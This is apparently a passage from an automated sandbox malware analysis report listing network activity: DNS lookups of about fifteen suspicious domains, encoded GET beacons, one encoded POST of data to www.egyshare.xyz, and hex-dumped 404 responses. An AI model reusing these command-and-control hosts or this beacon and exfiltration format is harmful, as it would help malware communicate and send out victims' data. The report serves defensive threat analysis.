                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8ewn/?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.remedies.proConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /440l/?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.egyshare.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3ifu/?fh=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtTD08CNBMN4l2lkk/418RVw+aNXyvs4RLuFyzfcvLA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.samundri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4ii9/?fh=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74THGa4p/rcEpcgteY+NZBAve/cPV6mEezHweDFAvow==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /sa1b/?fh=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/veVHbD1fWEHf5TqpC81TauCsO8XC98q6/wqQrn6ig==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t19yd.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gua3/?fh=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE1my8b04S6WdWKB/MDuWSU+6nbfM6wifiPOcueyLhQ==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.atendefacil.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k4tn/?fh=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0B7YhLYlkSpf0LkSvuXOrVZCV81o0QxXj1FyFrGf5Q==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sitioseguro.blogConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tskk/?fh=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktnI+jDBp8l2kGV3Ckdt2Sxo97xdpdVJjZoS3MkxEfg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dating-apps-az-dn5.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /27s6/?jnGlY=dHeXwH1PkJZDr&fh=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrMgSa7d6ydGcyUbb1sGAEKWqA4+Ev4Y2u0PwcF1BFA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.whisperart.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ez1t/?fh=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS6fcUEAY0yLCPgkUVbpQbsIDX53LfadnD8pal0m+9g==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ana-silverco.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.betmatchx.online
                Source: global trafficDNS traffic detected: DNS query: www.egldfi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
                Source: global trafficDNS traffic detected: DNS query: www.egyshare.xyz
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.samundri.online
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.t19yd.top
                Source: global trafficDNS traffic detected: DNS query: www.atendefacil.info
                Source: global trafficDNS traffic detected: DNS query: www.uynline.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: global trafficDNS traffic detected: DNS query: www.ana-silverco.shop
                Source: global trafficDNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: unknownHTTP traffic detected: POST /440l/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.egyshare.xyzOrigin: http://www.egyshare.xyzContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 203Referer: http://www.egyshare.xyz/440l/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Data Raw: 66 68 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 48 7a 6c 77 6e 38 65 31 78 76 4a 59 68 4c 69 47 72 79 49 39 68 47 39 59 4d 6c 43 48 45 4d 73 4c 35 51 59 3d Data Ascii: fh=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chHzlwn8e1xvJYhLiGryI9hG9YMlCHEMsL5QY=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:22:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:22:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:22:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:22:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:22:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:22:54 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:22:57 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:22:59 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:23:07 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:23:09 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 